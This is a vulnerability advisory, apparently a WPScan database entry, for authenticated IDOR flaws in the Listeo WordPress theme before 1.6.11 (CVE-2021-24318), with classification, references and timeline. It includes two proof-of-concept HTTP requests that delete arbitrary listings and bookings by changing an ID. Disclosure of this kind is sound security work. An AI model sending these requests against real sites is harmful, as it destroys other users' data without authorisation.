logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Listeo < 1.6.11 - Multiple Authenticated IDOR Vulnerabilities

Description

The theme did not ensure that the Post/Page and Booking to delete belong to the user making the request, allowing any authenticated users to delete arbitrary page/post and booking via an IDOR vector.

Proof of Concept

### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ]

[!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100

[!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1
Host: listeo.pro
Cookie: [user cookies]



### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: listeo.pro
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: [user cookies]

action=listeo_bookings_manage&booking_id=13&status=deleted

Affects Themes

listeo

Fixed in version 1.6.11

References

CVE

CVE-2021-24318

URL

https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-639%5D-Listeo-WordPress-Theme-v1.6.10.txt

Classification

Type

IDOR

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website

https://m0ze.ru

Submitter twitter

vladm0ze

Verified

No

WPVDB ID

9afa7e11-68b3-4196-975e-8b3f8e68ce56

Timeline

Publicly Published

2021-05-16 (about 4 months ago)

Added

2021-05-16 (about 4 months ago)

Last Updated

2021-05-18 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin